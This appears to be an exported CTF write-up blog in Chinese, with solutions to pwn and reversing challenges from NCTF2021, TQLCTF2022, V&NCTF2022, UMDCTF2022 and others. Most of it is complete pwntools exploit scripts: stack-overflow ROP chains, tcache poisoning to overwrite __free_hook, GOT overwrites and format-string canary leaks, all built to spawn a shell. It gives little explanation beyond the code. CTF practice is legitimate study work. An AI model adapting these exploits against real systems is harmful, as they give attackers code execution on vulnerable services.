<h1 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h1><h2 id="hardcsharp"><a href="#hardcsharp" class="headerlink" title="hardcsharp"></a>hardcsharp</h2><figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">Main</span>(<span class="params"><span class="built_in">string</span>[] args</span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> AesClass class2 = <span class="keyword">new</span> AesClass();</span><br><span class="line"> <span class="built_in">string</span> key = <span class="string">""</span>;</span><br><span class="line"> <span class="built_in">string</span> strB = <span class="string">"1Umgm5LG6lNPyRCd0LktJhJtyBN7ivpq+EKGmTAcXUM+0ikYZL4h4QTHGqH/3Wh0"</span>;</span><br><span class="line"> <span class="built_in">byte</span>[] buffer = <span class="keyword">new</span> <span class="built_in">byte</span>[] { </span><br><span class="line"> <span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x44</span>, <span class="number">0x5c</span>, <span class="number">0x5e</span>, <span class="number">0x56</span>, <span class="number">0x5d</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>,</span><br><span class="line"> <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span></span><br><span class="line"> };</span><br><span class="line"> Console.WriteLine(<span class="string">"Welcome to nepnep csharp test! plz input the magical code:"</span>);</span><br><span class="line"> <span class="built_in">string</span> str = Console.ReadLine();</span><br><span class="line"> <span class="keyword">if</span> (str.Length != <span class="number">0x25</span>)</span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"Nope!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ((str.Substring(<span class="number">0</span>, <span class="number">4</span>) != <span class="string">"Nep{"</span>) || (str[<span class="number">0x24</span>] != <span class="string">'}'</span>))</span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"Nope!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">for</span> (<span class="built_in">int</span> i = <span class="number">0</span>; i < <span class="number">0x20</span>; i++)</span><br><span class="line"> {</span><br><span class="line"> key = key + Convert.ToChar((<span class="built_in">int</span>) (buffer[i] ^ <span class="number">0x33</span>)).ToString();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">string</span>.Compare(class2.AesEncrypt(str, key), strB) == <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"wow, you pass it!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"Nope!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>反编译出c#代码</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">a = [<span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x44</span>, <span class="number">0x5c</span>, <span class="number">0x5e</span>, <span class="number">0x56</span>, <span class="number">0x5d</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>,</span><br><span class="line"> <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(a)):</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">chr</span>(a[i] ^ <span class="number">0x33</span>),end=<span class="string">""</span>)</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">python3 test.py</span><br><span class="line">badbadwomen!!!!!!!!!!!!!!!!!!!!!</span><br></pre></td></tr></table></figure>
<p>Aes加密网站一波:</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210322133852.png" alt="20210322133852"></p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>NCTF2021</title>
<url>/article/NCTF2021/</url>
<content><![CDATA[<h1 id="NCTF2021"><a href="#NCTF2021" class="headerlink" title="NCTF2021"></a>NCTF2021</h1><!-- 文章页 配置 -->
<h1 id="login"><a href="#login" class="headerlink" title="login"></a>login</h1><h2 id="函数中的syscall调用"><a href="#函数中的syscall调用" class="headerlink" title="函数中的syscall调用"></a>函数中的syscall调用</h2><p>close函数中有调用syscall</p>
<p><img src="/article/NCTF2021/image-20211129205721889.png" alt="image-20211129205721889"></p>
<p>题关闭了 <code>stdout</code> 和 <code>stderr</code>, 拿到 shell 后 <code>cat flag>&0</code></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'login1'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'81.69.185.153'</span>,<span class="number">8011</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line"> payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)</span><br><span class="line"> payload += p64(<span class="number">0x000000000401270</span>)</span><br><span class="line"> <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">main = <span class="number">0x40119a</span></span><br><span class="line">main_read = <span class="number">0x0000000004011ED</span></span><br><span class="line">fake_stack = <span class="number">0x404090</span></span><br><span class="line">read_got = <span class="number">0x404030</span></span><br><span class="line">close_got = <span class="number">0x404028</span></span><br><span class="line">leave = <span class="number">0x40121f</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">'b 0x0000000004011E8'</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x100</span> + p64(fake_stack+<span class="number">0x100</span>) + p64(main_read) </span><br><span class="line">p.sendafter(<span class="string">'Welcome to NCTF2021!'</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0x00000000040128A</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,close_got,<span class="number">1</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,fake_stack,<span class="number">0x3b</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += csu(close_got,fake_stack,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>,<span class="string">'\x00'</span>) + p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">'\xf5'</span>)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">'/bin/sh\x00'</span>.ljust(<span class="number">0x3B</span>,<span class="string">'\x00'</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="ezheap"><a href="#ezheap" class="headerlink" title="ezheap"></a>ezheap</h1><h2 id="libc-2-33"><a href="#libc-2-33" class="headerlink" title="libc-2.33"></a>libc-2.33</h2><p>申请9个chunk以及一个防止合并的chunk,都free掉之后,8和9都放到unsorted。</p>
<p>再申请一个chunk,来空出一个tcache位置,再free一次chunk9,就有chunk复用。</p>
<h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'ezheap'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Size: '</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'Content: '</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index: '</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'Content: '</span>,content) </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>): <span class="comment">#0-9</span></span><br><span class="line"> add(<span class="number">0x80</span>,<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>): <span class="comment">#7 tcache ,2 unsorted bin ,1 use chunk</span></span><br><span class="line"> free(i)</span><br><span class="line"></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">tmp = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">ptr0_11=tmp>><span class="number">36</span></span><br><span class="line">ptr0_23=((ptr0_11<<<span class="number">24</span>)^tmp)>><span class="number">24</span></span><br><span class="line">ptr0_35=((ptr0_23<<<span class="number">12</span>)^tmp)>><span class="number">12</span></span><br><span class="line">heap_base=ptr0_35<<<span class="number">12</span></span><br><span class="line">log.success(<span class="string">'heap_base: '</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x10</span> - <span class="number">96</span> </span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'a'</span>) <span class="comment">#10 # t=6 tcache malloc one chunk 7 -> 6</span></span><br><span class="line">free(<span class="number">8</span>)</span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">'bbbb'</span>) <span class="comment">#11</span></span><br><span class="line"></span><br><span class="line">ptr_addr = heap_base+<span class="number">0x720</span></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x19</span>)</span><br><span class="line">payload += p64(free_hook^(ptr_addr>><span class="number">12</span>))</span><br><span class="line">add(<span class="number">0x70</span>,payload) <span class="comment">#12</span></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'/bin/sh\x00'</span>) <span class="comment">#13</span></span><br><span class="line">add(<span class="number">0x80</span>,p64(system_addr)) <span class="comment">#14</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">13</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
<tags>
<tag>syscall</tag>
</tags>
</entry>
<entry>
<title>TQLCTF2022</title>
<url>/article/TQLCTF2022/</url>
<content><![CDATA[<h1 id="TQLCTF2022"><a href="#TQLCTF2022" class="headerlink" title="TQLCTF2022"></a>TQLCTF2022</h1><!-- 文章页 配置 -->
<h1 id="unbelievable-write"><a href="#unbelievable-write" class="headerlink" title="unbelievable_write"></a>unbelievable_write</h1><h2 id="libc-2-31"><a href="#libc-2-31" class="headerlink" title="libc-2.31"></a>libc-2.31</h2><p>没有泄露,没有pie。</p>
<p>c1函数malloc + readline后立即free掉了堆块。</p>
<p>c2函数可以堆上任意地址free,难点在于size检查。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">filename = <span class="string">'pwn2022'</span></span><br><span class="line">p = process(filename)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x404080</span></span><br><span class="line">prt = <span class="number">0x4040D0</span></span><br><span class="line">free_got = <span class="number">0x404018</span></span><br><span class="line"></span><br><span class="line">free(-<span class="number">0x290</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0x404018</span>)*<span class="number">0x40</span> + p64(<span class="number">0x404080</span>)*<span class="number">0x40</span></span><br><span class="line">add(<span class="number">0x280</span>,payload)</span><br><span class="line">payload = p64(<span class="number">0x4013be</span>) + p64(<span class="number">0x401040</span>) + p64(<span class="number">0x401050</span>)</span><br><span class="line">add(<span class="number">0xa0</span>,payload)</span><br><span class="line">add(<span class="number">0x320</span>,<span class="string">'1111'</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>UTCTF2022</title>
<url>/article/UTCTF2022/</url>
<content><![CDATA[<h1 id="UTCTF2022"><a href="#UTCTF2022" class="headerlink" title="UTCTF2022"></a>UTCTF2022</h1><blockquote>
<p>咕咕咕回忆:当时有好几个CTF同时进行,这个只是看了一下然后就没有时间去在比赛时间做题了。</p>
</blockquote>
<h1 id="Smol-Overflow"><a href="#Smol-Overflow" class="headerlink" title="Smol Overflow"></a>Smol Overflow</h1><blockquote>
<p>You can have a little overflow, as a treat</p>
<p>By Tristan (@trab on discord)</p>
<p><code>nc pwn.utctf.live 5004</code></p>
</blockquote>
<h1 id="Automated-Exploit-Generation-2"><a href="#Automated-Exploit-Generation-2" class="headerlink" title="Automated Exploit Generation 2"></a>Automated Exploit Generation 2</h1><blockquote>
<p>Now with printf!</p>
<p>By Tristan (@trab on discord)</p>
<p>nc pwn.utctf.live 5002</p>
</blockquote>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>V&NCTF2022</title>
<url>/article/V&NCTF2022/</url>
<content><![CDATA[<h1 id="V-amp-NCTF2022"><a href="#V-amp-NCTF2022" class="headerlink" title="V&NCTF2022"></a>V&NCTF2022</h1><h1 id="clear-got"><a href="#clear-got" class="headerlink" title="clear_got"></a>clear_got</h1><p><img src="/article/V&NCTF2022/image-20220225153956554.png" alt="image-20220225153956554"></p>
<p><img src="/article/V&NCTF2022/image-20220225153934386.png" alt="image-20220225153934386"></p>
<p><img src="/article/V&NCTF2022/image-20220225153923845.png" alt="image-20220225153923845"></p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>栈溢出。利用end2函数泄露libc,再回到main函数的 <code>mov eax, 0</code>,调用sysread写system地址到 <code>puts@got</code> ,最后 <code>call puts</code> 即 getshell。</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'clear_got'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">main_addr = elf.sym[<span class="string">'main'</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line">libc_main_got = elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">syscall = <span class="number">0x00000000040077E</span></span><br><span class="line">syswrite = <span class="number">0x0000000000400774</span></span><br><span class="line">pop_rdi = <span class="number">0x00000000004007f3</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x00000000004007f1</span></span><br><span class="line">bss = <span class="number">0x60107C</span></span><br><span class="line">mov_eax = <span class="number">0x00000000040075C</span></span><br><span class="line">call_puts = <span class="number">0x00000000040071E</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'competition.///'</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x68</span> + p64(pop_rdi) + p64(<span class="number">1</span>) + p64(pop_rsi_r15) + p64(libc_main_got) + p64(<span class="number">0</span>) + p64(syswrite) </span><br><span class="line">payload += p64(mov_eax) + p64(pop_rdi) + p64(<span class="number">0</span>) + p64(pop_rsi_r15) + p64(puts_got)*<span class="number">2</span> + p64(syscall) </span><br><span class="line">payload += p64(pop_rdi) + p64(puts_got+<span class="number">8</span>) + p64(call_puts)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">libc_main = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">libc_base = libc_main - libc.sym[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">log.success(<span class="string">'libc_main: '</span> + <span class="built_in">hex</span>(libc_main))</span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">payload = p64(system_addr) + <span class="string">'/bin/sh\x00'</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>UMDCTF2022</title>
<url>/article/UMDCTF2022/</url>
<content><![CDATA[<h1 id="umdctf2022"><a href="#umdctf2022" class="headerlink" title="umdctf2022"></a>umdctf2022</h1><p><a href="https://umdctf.io/">umdctf</a></p>
<h1 id="Legacy"><a href="#Legacy" class="headerlink" title="Legacy"></a>Legacy</h1><blockquote>
<p>nc 0.cloud.chals.io 28964</p>
<p>tag: python2</p>
</blockquote>
<h2 id="概要"><a href="#概要" class="headerlink" title="概要"></a>概要</h2><p>python2的input函数漏洞</p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>输入字符类型直接报错,利用报错信息发现关键<code>if (input(str(3-i) + " chances left! \n") == secret):</code>。直接输入<code>secret</code>即可绕过。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># nc 0.cloud.chals.io 28964</span></span><br><span class="line">I bet you can<span class="string">'t guess my *secret* number!</span></span><br><span class="line"><span class="string">I'</span>ll give you hint, its between 0 and 0,1000000000000000514!</span><br><span class="line">aaaa</span><br><span class="line">3 chances left! </span><br><span class="line">Traceback (most recent call last):</span><br><span class="line"> File <span class="string">"/home/ctf/legacy.py"</span>, line 15, <span class="keyword">in</span> <module></span><br><span class="line"> <span class="keyword">if</span> (input(str(3-i) + <span class="string">" chances left! \n"</span>) == secret):</span><br><span class="line"> File <span class="string">"<string>"</span>, line 1, <span class="keyword">in</span> <module></span><br><span class="line">NameError: name <span class="string">'aaaa'</span> is not defined</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># nc 0.cloud.chals.io 28964</span></span><br><span class="line">I bet you can<span class="string">'t guess my *secret* number!</span></span><br><span class="line"><span class="string">I'</span>ll give you hint, its between 0 and 0,1000000000000000514!</span><br><span class="line">secret</span><br><span class="line">3 chances left! </span><br><span class="line">No way!</span><br><span class="line">UMDCTF{W3_H8_p7th0n2}</span><br></pre></td></tr></table></figure>
<h1 id="Classic-Act"><a href="#Classic-Act" class="headerlink" title="Classic Act"></a>Classic Act</h1><blockquote>
<p>tag: ROP fmt</p>
</blockquote>
<h2 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Arch: amd64-64-little</span><br><span class="line">RELRO: Partial RELRO</span><br><span class="line">Stack: Canary found</span><br><span class="line">NX: NX enabled</span><br><span class="line">PIE: No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'classicact'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span></span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x00000000004013a3</span></span><br><span class="line">ret = <span class="number">0x000000000040101a</span></span><br><span class="line">payload = <span class="string">'%19$paaaa%25$p'</span></span><br><span class="line">p.sendlineafter(<span class="string">'Please enter your name!'</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">'Hello:\n'</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(p.recv(<span class="number">18</span>),<span class="number">16</span>)</span><br><span class="line">p.recvuntil(<span class="string">'aaaa'</span>)</span><br><span class="line">libc_main = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">240</span></span><br><span class="line"></span><br><span class="line">libc_base = libc_main - libc.sym[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">sys = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">bin_sh = libc_base + libc.search(<span class="string">'/bin/sh'</span>).<span class="built_in">next</span>()</span><br><span class="line">log.success(<span class="string">'canary: '</span> + <span class="built_in">hex</span>(canary))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'Play in UMDCTF!'</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x48</span>)</span><br><span class="line">payload += p64(canary)*<span class="number">2</span> + p64(pop_rdi) + p64(bin_sh) + p64(sys)</span><br><span class="line">p.sendlineafter(<span class="string">'today?'</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="The-Show-Must-Go-On"><a href="#The-Show-Must-Go-On" class="headerlink" title="The Show Must Go On"></a>The Show Must Go On</h1><blockquote>
<p>We are in the business of entertainment, the show must go on! Hope we can find someone to replace our old act super fast…</p>
<p><strong>Author</strong>: WittsEnd2</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">0.cloud.chals.io 30138</span><br></pre></td></tr></table></figure>
<p>tag: heap-overflow</p>
</blockquote>
